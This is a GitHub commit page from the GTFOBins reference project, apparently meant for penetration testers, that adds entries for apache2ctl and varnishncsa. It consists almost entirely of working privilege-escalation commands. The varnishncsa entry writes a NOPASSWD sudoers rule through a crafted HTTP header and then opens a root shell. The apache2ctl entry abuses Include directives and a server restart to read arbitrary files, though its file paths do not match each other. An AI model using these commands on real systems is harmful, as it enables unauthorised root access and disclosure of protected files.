Add varnishncsa & apache2ctl

This commit adds 2 files (_gtfobins/apache2ctl.md and _gtfobins/varnishncsa.md) containing privilege escalation methods for the varnishncsa and apache2ctl utilities.
GTFOBins · Jun 19, 2023 · 2f20c1a · 2f20c1a
1 parent d48892a
commit 2f20c1a
Show file tree

Hide file tree

Showing 2 changed files with 24 additions and 0 deletions.
diff --git a/_gtfobins/apache2ctl.md b/_gtfobins/apache2ctl.md
@@ -0,0 +1,16 @@
+---
+description: apache2ctl is a front end to the Apache HyperText Transfer Protocol (HTTP) server. It is designed to help the administrator control the functioning of the Apache apache2 daemon.
+functions:
+    file-read:
+        - code: cp -r /etc/apache2/ /tmp/apache2
+        - code: |
+            LFILE=file_to_read
+            echo "Include $LFILE" >> /tmp/test
+        - code: apache2ctl -d /tmp/apache2 -k restart
+    sudo:
+        - code: cp -r /etc/apache2/ /tmp/apache2
+        - code: |
+            LFILE=file_to_read
+            echo "Include $LFILE" >> /tmp/test
+        - code: sudo apache2ctl -d /path/to/apache2 -k restart
+---
diff --git a/_gtfobins/varnishncsa.md b/_gtfobins/varnishncsa.md
@@ -0,0 +1,8 @@
+---
+description: varnishncsa utility reads varnishd shared memory Varnish logs and presents them in the Apache / NCSA "combined" log format.
+functions:
+    sudo:
+        - code: sudo varnishncsa -g request -q "ReqURL ~ \"/exploit_randomfoo\"" -F '%{exploit}i' -w /etc/sudoers.d/user &
+        - code: curl -H 'exploit: user ALL = (ALL) NOPASSWD: ALL' localhost:6081/exploit_randomfoo
+        - code: sudo bash
+---